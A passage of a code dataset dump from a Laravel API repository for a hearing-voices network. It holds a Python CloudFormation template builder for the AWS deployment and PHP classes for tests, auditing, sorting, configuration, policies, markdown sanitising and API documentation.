docker_repository_name_variable\n ])\n ]),\n MemoryReservation='256',\n Essential=True,\n LogConfiguration=ecs.LogConfiguration(\n LogDriver='awslogs',\n Options={\n 'awslogs-group': Ref(scheduler_log_group_resource),\n 'awslogs-region': Ref('AWS::Region'),\n 'awslogs-stream-prefix': 'ecs'\n }\n ),\n Command=[\n 'php',\n 'artisan',\n 'cv:schedule:loop'\n ],\n WorkingDirectory='/var/www/html',\n HealthCheck=ecs.HealthCheck(\n Command=[\n 'CMD-SHELL',\n 'php -v || exit 1'\n ],\n Interval=30,\n Retries=3,\n Timeout=5\n )\n )]\n )\n)\n\nload_balancer_resource = template.add_resource(\n elb.LoadBalancer(\n 'LoadBalancer',\n Scheme='internet-facing',\n SecurityGroups=[GetAtt(load_balancer_security_group_resource, 'GroupId')],\n Subnets=Ref(subnets_parameter),\n )\n)\n\napi_target_group_resource = template.add_resource(\n elb.TargetGroup(\n 'ApiTargetGroup',\n HealthCheckIntervalSeconds=30,\n HealthCheckPath='/',\n HealthCheckPort='traffic-port',\n HealthCheckProtocol='HTTP',\n HealthCheckTimeoutSeconds=5,\n HealthyThresholdCount=5,\n UnhealthyThresholdCount=2,\n Port=80,\n Protocol='HTTP',\n TargetType='instance',\n VpcId=Ref(vpc_parameter),\n DependsOn=[load_balancer_resource]\n )\n)\n\nload_balancer_http_listener_resource = template.add_resource(\n elb.Listener(\n 'LoadBalancerHttpListener',\n LoadBalancerArn=Ref(load_balancer_resource),\n Port=80,\n Protocol='HTTP',\n DefaultActions=[\n elb.Action(\n Type='redirect',\n RedirectConfig=elb.RedirectConfig(\n Port='443',\n Protocol='HTTPS',\n StatusCode='HTTP_301'\n )\n )\n ]\n )\n)\n\nload_balancer_https_listener_resource = template.add_resource(\n elb.Listener(\n 'LoadBalancerListener',\n LoadBalancerArn=Ref(load_balancer_resource),\n Port=443,\n Protocol='HTTPS',\n DefaultActions=[\n elb.Action(\n Type='forward',\n TargetGroupArn=Ref(api_target_group_resource)\n )\n ],\n Certificates=[\n elb.Certificate(\n CertificateArn=Ref(certificate_arn_parameter)\n )\n ]\n )\n)\n\necs_service_role_resource = template.add_resource(\n iam.Role(\n 'ECSServiceRole',\n AssumeRolePolicyDocument={\n 'Version': '2012-10-17',\n 'Statement': [\n {\n 'Action': 'sts:AssumeRole',\n 'Effect': 'Allow',\n 'Principal': {\n 'Service': 'ecs.amazonaws.com'\n }\n }\n ]\n },\n Policies=[\n iam.Policy(\n PolicyName='ECSServiceRolePolicy',\n PolicyDocument={\n 'Statement': [\n {\n 'Effect': 'Allow',\n 'Action': [\n 'ec2:AttachNetworkInterface',\n 'ec2:CreateNetworkInterface',\n 'ec2:CreateNetworkInterfacePermission',\n 'ec2:DeleteNetworkInterface',\n 'ec2:DeleteNetworkInterfacePermission',\n 'ec2:Describe*',\n 'ec2:DetachNetworkInterface',\n 'elasticloadbalancing:DeregisterInstancesFromLoadBalancer',\n 'elasticloadbalancing:DeregisterTargets',\n 'elasticloadbalancing:Describe*',\n 'elasticloadbalancing:RegisterInstancesWithLoadBalancer',\n 'elasticloadbalancing:RegisterTargets',\n 'route53:ChangeResourceRecordSets',\n 'route53:CreateHealthCheck',\n 'route53:DeleteHealthCheck',\n 'route53:Get*',\n 'route53:List*',\n 'route53:UpdateHealthCheck',\n 'servicediscovery:DeregisterInstance',\n 'servicediscovery:Get*',\n 'servicediscovery:List*',\n 'servicediscovery:RegisterInstance',\n 'servicediscovery:UpdateInstanceCustomHealthStatus'\n ],\n 'Resource': '*'\n },\n {\n 'Effect': 'Allow',\n 'Action': [\n 'ec2:CreateTags'\n ],\n 'Resource': 'arn:aws:ec2:*:*:network-interface/*'\n }\n ]\n }\n )\n ]\n )\n)\n\napi_service_resource = template.add_resource(\n ecs.Service(\n 'ApiService',\n ServiceName='api',\n Cluster=Ref(ecs_cluster_resource),\n TaskDefinition=Ref(api_task_definition_resource),\n DeploymentConfiguration=ecs.DeploymentConfiguration(\n MinimumHealthyPercent=100,\n MaximumPercent=200\n ),\n DesiredCount=Ref(api_task_count_parameter),\n LaunchType='EC2',\n LoadBalancers=[ecs.LoadBalancer(\n ContainerName='api',\n ContainerPort=80,\n TargetGroupArn=Ref(api_target_group_resource)\n )],\n Role=Ref(ecs_service_role_resource),\n DependsOn=[\n load_balancer_http_listener_resource,\n load_balancer_https_listener_resource\n ]\n )\n)\n\nqueue_worker_service_resource = template.add_resource(\n ecs.Service(\n 'QueueWorkerService',\n ServiceName='queue-worker',\n Cluster=Ref(ecs_cluster_resource),\n TaskDefinition=Ref(queue_worker_task_definition_resource),\n DeploymentConfiguration=ecs.DeploymentConfiguration(\n MinimumHealthyPercent=0,\n MaximumPercent=100\n ),\n DesiredCount=Ref(queue_worker_task_count_parameter),\n LaunchType='EC2'\n )\n)\n\nscheduler_service_resource = template.add_resource(\n ecs.Service(\n 'SchedulerService',\n ServiceName='scheduler',\n Cluster=Ref(ecs_cluster_resource),\n TaskDefinition=Ref(scheduler_task_definition_resource),\n DeploymentConfiguration=ecs.DeploymentConfiguration(\n MinimumHealthyPercent=0,\n MaximumPercent=100\n ),\n DesiredCount=Ref(scheduler_task_count_parameter),\n LaunchType='EC2'\n )\n)\n\nautoscaling_group_resource = template.add_resource(\n autoscaling.AutoScalingGroup(\n 'AutoScalingGroup',\n DesiredCapacity=Ref(api_instance_count_parameter),\n MinSize=Ref(api_instance_count_parameter),\n MaxSize=Ref(api_instance_count_parameter),\n LaunchTemplate=autoscaling.LaunchTemplateSpecification(\n LaunchTemplateId=Ref(launch_template_resource),\n Version=GetAtt(launch_template_resource, 'LatestVersionNumber')\n ),\n AvailabilityZones=['eu-west-1a', 'eu-west-1b', 'eu-west-1c']\n )\n)\n\napi_user_resource = template.add_resource(\n iam.User(\n 'ApiUser',\n UserName=api_user_name_variable,\n Policies=[\n iam.Policy(\n PolicyName='ApiUserPolicy',\n PolicyDocument={\n 'Version': '2012-10-17',\n 'Statement': [\n {\n 'Action': 's3:*',\n 'Effect': 'Allow',\n 'Resource': [\n GetAtt(uploads_bucket_resource, 'Arn'),\n Join('/', [GetAtt(uploads_bucket_resource, 'Arn'), '*'])\n ]\n },\n {\n 'Action': 'sqs:*',\n 'Effect': 'Allow',\n 'Resource': GetAtt(default_queue_resource, 'Arn')\n }\n ]\n }\n )\n ]\n )\n)\n\nci_user_resource = template.add_resource(\n iam.User(\n 'CiUser',\n UserName=ci_user_name_variable,\n Policies=[\n iam.Policy(\n PolicyName='CiUserPolicy',\n PolicyDocument={\n 'Version': '2012-10-17',\n 'Statement': [\n {\n 'Action': 'ecr:*',\n 'Effect': 'Allow',\n 'Resource': '*'\n },\n {\n 'Action': 'ecs:UpdateService',\n 'Effect': 'Allow',\n 'Resource': '*'\n },\n {\n 'Action': 'secretsmanager:GetSecretValue',\n 'Effect': 'Allow',\n 'Resource': '*'\n }\n ]\n }\n )\n ]\n )\n)\n\n# ==================================================\n# Outputs.\n# ==================================================\ntemplate.add_output(\n Output(\n 'DatabaseName',\n Description='The database name',\n Value=database_username_variable\n )\n)\n\ntemplate.add_output(\n Output(\n 'DatabaseUsername',\n Description='The username for the database',\n Value=database_username_variable\n )\n)\n\ntemplate.add_output(\n Output(\n 'DatabaseHost',\n Description='The host of the RDS instance',\n Value=GetAtt(database_resource, 'Endpoint.Address')\n )\n)\n\ntemplate.add_output(\n Output(\n 'DatabasePort',\n Description='The port of the RDS instance',\n Value=GetAtt(database_resource, 'Endpoint.Port')\n )\n)\n\ntemplate.add_output(\n Output(\n 'RedisHost',\n Description='The host of the Redis instance',\n Value=GetAtt(redis_resource, 'RedisEndpoint.Address')\n )\n)\n\ntemplate.add_output(\n Output(\n 'RedisPort',\n Description='The port of the Redis instance',\n Value=GetAtt(redis_resource, 'RedisEndpoint.Port')\n )\n)\n\ntemplate.add_output(\n Output(\n 'DefaultQueue',\n Description='The name of the default queue',\n Value=default_queue_name_variable\n )\n)\n\ntemplate.add_output(\n Output(\n 'LoadBalancerDomain',\n Description='The domain name of the load balancer',\n Value=GetAtt(load_balancer_resource, 'DNSName')\n )\n)\n\ntemplate.add_output(\n Output(\n 'DockerRepositoryUri',\n Description='The URI of the Docker repository',\n Value=Sub('${AWS::AccountId}.dkr.ecr.${AWS::Region}.amazonaws.com/${RepositoryName}', RepositoryName=Ref(docker_repository_resource))\n )\n)\n\ntemplate.add_output(\n Output(\n 'DockerClusterName',\n Description='The name of the Docker cluster',\n Value=Ref(ecs_cluster_resource)\n )\n)\n\n# ==================================================\n# Print the generated template in JSON.\n# ==================================================\nprint(template.to_json())\n"
},
{
"alpha_fraction": 0.5085646510124207,
"alphanum_fraction": 0.5097460150718689,
"avg_line_length": 21.87837791442871,
"blob_id": "c1c7f64366520d00b2440fcf6f9fc0b12a3497b7",
"content_id": "ede10de1b104b056ecb9b364bbb9357f6088ef64",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1693,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 74,
"path": "/tests/Support/TestResponse.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Support;\n\nuse Illuminate\\Foundation\\Testing\\Assert as PHPUnit;\nuse Illuminate\\Foundation\\Testing\\TestResponse as BaseTestResponse;\n\nclass TestResponse extends BaseTestResponse\n{\n /**\n * Assert the JSON structure of an Eloquent API Resource Collection.\n *\n * @param array|null $structure\n */\n public function assertCollectionDataStructure(array $structure = null): void\n {\n $this->assertJsonStructure([\n 'data' => [$structure],\n 'meta' => [\n 'current_page',\n 'from',\n 'last_page',\n 'path',\n 'per_page',\n 'to',\n 'total',\n ],\n 'links' => [\n 'first',\n 'last',\n 'prev',\n 'next',\n ],\n ]);\n }\n\n /**\n * @param array|null $structure\n */\n public function assertResourceDataStructure(array $structure = null): void\n {\n $this->assertJsonStructure(['data' => $structure]);\n }\n\n /**\n * @param int $index\n * @param string $id\n */\n public function assertNthIdInCollection(int $index, string $id): void\n {\n $data = $this->getData();\n\n PHPUnit::assertGreaterThanOrEqual($index + 1, count($data));\n PHPUnit::assertEquals($id, $data[$index]['id']);\n }\n\n /**\n * @return array\n */\n public function getData(): array\n {\n return json_decode($this->getContent(), true)['data'];\n }\n\n /**\n * @return string\n */\n public function getId(): string\n {\n return $this->getData()['id'];\n }\n}\n"
},
{
"alpha_fraction": 0.595942497253418,
"alphanum_fraction": 0.5967878103256226,
"avg_line_length": 23.64583396911621,
"blob_id": "b152202dd3573912130335f4600d90af1ed32c0d",
"content_id": "ac2c2f15e8422dedd90e22fba088a72124e17987",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1183,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 48,
"path": "/app/Listeners/AuditLogger.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Listeners;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Services\\AuditService;\nuse Illuminate\\Contracts\\Queue\\ShouldQueue;\nuse Illuminate\\Queue\\InteractsWithQueue;\n\nclass AuditLogger implements ShouldQueue\n{\n use InteractsWithQueue;\n\n /**\n * @var \\App\\Services\\AuditService\n */\n protected $auditService;\n\n /**\n * AuditLogger constructor.\n *\n * @param \\App\\Services\\AuditService $auditService\n */\n public function __construct(AuditService $auditService)\n {\n $this->auditService = $auditService;\n }\n\n /**\n * Handle the event.\n *\n * @param \\App\\Events\\EndpointInvoked $event\n */\n public function handle(EndpointInvoked $event): void\n {\n $this->auditService->create([\n 'user_id' => $event->getUser()->id ?? null,\n 'client_id' => $event->getClient()->id ?? null,\n 'action' => $event->getAction(),\n 'description' => $event->getDescription(),\n 'ip_address' => $event->getIpAddress(),\n 'user_agent' => $event->getUserAgent(),\n 'created_at' => $event->getCreatedAt(),\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.6228710412979126,
"alphanum_fraction": 0.6253041625022888,
"avg_line_length": 26.399999618530273,
"blob_id": "ce977d4f970619e135c136d0adcbe2a874ee812e",
"content_id": "5bc8c56b3960aabb676f0f2c089bc161001ac0ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 822,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 30,
"path": "/app/Http/Sorts/Admin/EmailSort.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Sorts\\Admin;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\Sorts\\Sort;\n\nclass EmailSort implements Sort\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param bool $descending\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $descending, string $property): Builder\n {\n $descending = $descending ? 'DESC' : 'ASC';\n\n $subQuery = DB::table('users')\n ->select('users.email')\n ->where('users.id', '=', DB::raw('`admins`.`user_id`'))\n ->take(1);\n\n return $query->orderByRaw(\"({$subQuery->toSql()}) $descending\", $subQuery->getBindings());\n }\n}\n"
},
{
"alpha_fraction": 0.5263158082962036,
"alphanum_fraction": 0.5338345766067505,
"avg_line_length": 11.090909004211426,
"blob_id": "0bc86c9c6b48ed44f6d069a1bc5e2e65b8110788",
"content_id": "13c701127d77f4259b6c4573f45c8ca5b89e8197",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 133,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 11,
"path": "/config/sms.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nreturn [\n\n 'driver' => env('SMS_DRIVER', 'null'),\n\n 'from' => env('SMS_FROM', 'Example'),\n\n];\n"
},
{
"alpha_fraction": 0.6770833134651184,
"alphanum_fraction": 0.6875,
"avg_line_length": 8.600000381469727,
"blob_id": "730abd0cd649f1b96e166c69b1cc4e8376beb631",
"content_id": "5ea4a02269f11956bff2d434cb6cc67f7f872783",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 96,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/FileTokenScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait FileTokenScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.46666666865348816,
"alphanum_fraction": 0.4740740656852722,
"avg_line_length": 9.384614944458008,
"blob_id": "33d36a9759bf1b2a9204a7fc092d8ed18f475c8c",
"content_id": "a5cdc52c2b2901b0f30cefe47138f5e56d897d62",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 135,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 13,
"path": "/config/ayup.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nreturn [\n\n 'name' => 'Ayup Digital',\n\n 'url' => 'https://ayup.agency',\n\n 'email' => '[email protected]',\n\n];\n"
},
{
"alpha_fraction": 0.6331126093864441,
"alphanum_fraction": 0.634437084197998,
"avg_line_length": 19.405405044555664,
"blob_id": "cd42246c83a92d0b0b962af64c6a4e12440185b4",
"content_id": "1bc3747a5a43a4b12c1db7302d93aad9f1be4ff1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 755,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 37,
"path": "/app/Policies/NotificationPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\Notification;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass NotificationPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list notifications.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function list(User $user): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can view the notification.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Notification $notification\n * @return bool\n */\n public function view(User $user, Notification $notification): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.6836734414100647,
"alphanum_fraction": 0.6938775777816772,
"avg_line_length": 8.800000190734863,
"blob_id": "988952f0b3fb47fa4d46658686d79f79660021ac",
"content_id": "4b0e0e336979535a866ad5786105b9901e22e1cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 98,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/CountryMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait CountryMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6301652789115906,
"alphanum_fraction": 0.6322314143180847,
"avg_line_length": 19.16666603088379,
"blob_id": "96f20d0566967ab63918dad2b7767277b3eb7589",
"content_id": "3f5c13a5bc8b22fe31f6737d505b0a80a476e7a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 484,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 24,
"path": "/app/Http/Requests/Export/RequestExportRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Export;\n\nuse App\\Exporters\\AllExporter;\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass RequestExportRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'export' => ['bail', 'string', Rule::in([AllExporter::type()])],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5875805616378784,
"alphanum_fraction": 0.588166356086731,
"avg_line_length": 27.93220329284668,
"blob_id": "685b475d66a0a9c84dd7b11fa2be5f593731f713",
"content_id": "75e6387b9646d358eb3feb559cf232a19309b362",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1707,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 59,
"path": "/tests/Unit/Services/FileServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\File\\FileRequested;\nuse App\\Models\\Admin;\nuse App\\Models\\File;\nuse App\\Services\\FileService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass FileServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_file_token(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\FileService $fileService */\n $fileService = resolve(FileService::class);\n\n $fileToken = $fileService->request($file, $admin);\n\n $this->assertDatabaseHas('file_tokens', ['id' => $fileToken->id]);\n $this->assertEquals($file->id, $fileToken->file->id);\n $this->assertEquals($admin->user->id, $fileToken->user->id);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_requested(): void\n {\n Event::fake([FileRequested::class]);\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->create();\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Services\\FileService $fileService */\n $fileService = resolve(FileService::class);\n\n $fileToken = $fileService->request($file, $admin);\n\n Event::assertDispatched(\n FileRequested::class,\n function (FileRequested $event) use ($file, $fileToken): bool {\n return $event->getFile()->is($file)\n && $event->getFileToken()->is($fileToken);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6736842393875122,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 8.5,
"blob_id": "328e147d7b5e967bdaa06a69c7d17f8cee8b2e2b",
"content_id": "51d9444410acfc292a29bcd735e2157dc760ed5d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 95,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/app/Models/Mutators/FileMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait FileMutators\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6145610213279724,
"alphanum_fraction": 0.6156316995620728,
"avg_line_length": 20.227272033691406,
"blob_id": "7a1a8267a98107e30c955822c8a0bf16d84d2d1a",
"content_id": "1644d353f0f70eb457ffeaadb1608c3892d3c558",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 934,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 44,
"path": "/app/VariableSubstitution/Email/EndUser/EmailConfirmationSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\EndUser;\n\nuse App\\Models\\EndUser;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\n\nclass EmailConfirmationSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\EndUser\n */\n protected $endUser;\n\n /**\n * @var string\n */\n protected $verifyEmailUrl;\n\n /**\n * EmailConfirmationSubstituter constructor.\n *\n * @param \\App\\Models\\EndUser $endUser\n * @param string $verifyEmailUrl\n */\n public function __construct(EndUser $endUser, string $verifyEmailUrl)\n {\n $this->endUser = $endUser;\n $this->verifyEmailUrl = $verifyEmailUrl;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'END_USER_EMAIL' => $this->endUser->user->email,\n 'VERIFY_EMAIL_URL' => $this->verifyEmailUrl,\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.56255042552948,
"alphanum_fraction": 0.5633575320243835,
"avg_line_length": 25.36170196533203,
"blob_id": "ddb4275323b8e9318d8f8fc86a84c11238abab13",
"content_id": "84e9b892aad94069477bdc75be739b8e01c135eb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2478,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 94,
"path": "/app/VariableSubstitution/BaseVariableSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution;\n\nabstract class BaseVariableSubstituter implements VariableSubstituter\n{\n /**\n * @param string $content The entire content including variables that need substituting\n * @return string|null\n */\n public function substitute(string $content): ?string\n {\n $this->validateVariables();\n $allVariables = $this->extractAllVariables($content);\n $supportedVariables = $this->filterSupportedVariables($allVariables);\n\n foreach ($supportedVariables as $supportedVariable) {\n $content = str_replace(\n \"(({$supportedVariable}))\",\n $this->variables()[$supportedVariable],\n $content\n );\n }\n\n return $content;\n }\n\n /**\n * @return array\n */\n abstract protected function variables(): array;\n\n /**\n * @throws \\InvalidArgumentException\n */\n protected function validateVariables(): void\n {\n foreach ($this->variables() as $key => $value) {\n if (!is_string($key)) {\n throw new \\InvalidArgumentException('The variable keys must be strings.');\n }\n\n if (!is_scalar($value)) {\n throw new \\InvalidArgumentException('The variable values must be scalars.');\n }\n }\n }\n\n /**\n * @param string $content\n * @return string[] The variables without the double brace wrapping\n */\n protected function extractAllVariables(string $content): array\n {\n $matches = [];\n\n preg_match_all('/\\(\\(([A-Z_]+)\\)\\)/', $content, $matches);\n\n return $matches[1];\n }\n\n /**\n * @param string[] $variables\n * @return string[]\n */\n protected function filterSupportedVariables(array $variables): array\n {\n $supportedVariables = [];\n\n foreach ($variables as $variable) {\n if (array_key_exists($variable, $this->variables())) {\n $supportedVariables[] = $variable;\n continue;\n }\n\n $this->logUnsupportedVariable($variable);\n }\n\n return $supportedVariables;\n }\n\n /**\n * @param string $variable\n */\n protected function logUnsupportedVariable(string $variable): void\n {\n logger()->warning(\"The variable [{$variable}] is not supported.\", [\n 'variable' => $variable,\n 'substituter' => static::class,\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.635796070098877,
"alphanum_fraction": 0.6378772258758545,
"avg_line_length": 30,
"blob_id": "65058d4c56e738d810f2397d003c4cb4fc3ae2b1",
"content_id": "347c215fcb93f16729c8f531f94e26f4212b2bf9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 961,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 31,
"path": "/app/Docs/Parameters/PerPageParameter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Parameters;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass PerPageParameter extends Parameter\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->in(static::IN_QUERY)\n ->name('per_page')\n ->description('The number of items to load per page')\n ->schema(\n Schema::integer()\n ->minimum(1)\n ->maximum(Config::get('connecting_voices.pagination.max'))\n ->default(Config::get('connecting_voices.pagination.default'))\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6772983074188232,
"alphanum_fraction": 0.6810506582260132,
"avg_line_length": 23.227272033691406,
"blob_id": "dbfd4a92dcf26a75906e2b33bb517cdfa6b4cb56",
"content_id": "8aa17b4e9a5f66b69eb381aee092042a855d7256",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 533,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 22,
"path": "/app/Docs/Server.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Server as BaseServer;\n\nclass Server extends BaseServer\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Server\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->url(url('/v1'))\n ->description('The API server');\n }\n}\n"
},
{
"alpha_fraction": 0.5536445379257202,
"alphanum_fraction": 0.5544635653495789,
"avg_line_length": 19.016393661499023,
"blob_id": "42b31e31873075e770a3907bb05f11121db432c7",
"content_id": "27a68f492f6ce9f9a061022b2b4b1af52ed618a6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1221,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 61,
"path": "/app/Support/Markdown.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Support;\n\nuse Parsedown;\n\nclass Markdown\n{\n /**\n * @var \\Parsedown\n */\n protected $parsedown;\n\n /**\n * Markdown constructor.\n *\n * @param \\Parsedown $parsedown\n */\n public function __construct(Parsedown $parsedown)\n {\n $this->parsedown = $parsedown;\n }\n\n /**\n * @param string $markdown\n * @return string\n */\n public function sanitise(string $markdown): string\n {\n // Strip all HTML tags.\n $markdown = strip_tags($markdown);\n\n // Hard removal of XSS.\n $markdown = str_replace('javascript:', '', $markdown);\n\n // Trim whitespaces after sanitising.\n $markdown = trim($markdown);\n\n return $markdown;\n }\n\n /**\n * Removed all markdown markup from the string.\n *\n * @param string $markdown\n * @return string\n */\n public function strip(string $markdown): string\n {\n // Convert the markdown to HTML.\n $html = $this->parsedown->text($markdown);\n\n // Replace line breaks with spaces.\n $html = mb_ereg_replace(\"\\n\", ' ', $html);\n\n // Sanitise the HTML.\n return $this->sanitise($html);\n }\n}\n"
},
{
"alpha_fraction": 0.6430788040161133,
"alphanum_fraction": 0.643699586391449,
"avg_line_length": 32.5625,
"blob_id": "68122453ab5ac7dcd60893ca72a4651126a61c4b",
"content_id": "40438083cc8480bb4aa74a4ddee3398df203711f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1611,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 48,
"path": "/app/Docs/Operations/Settings/UpdateSettingsOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
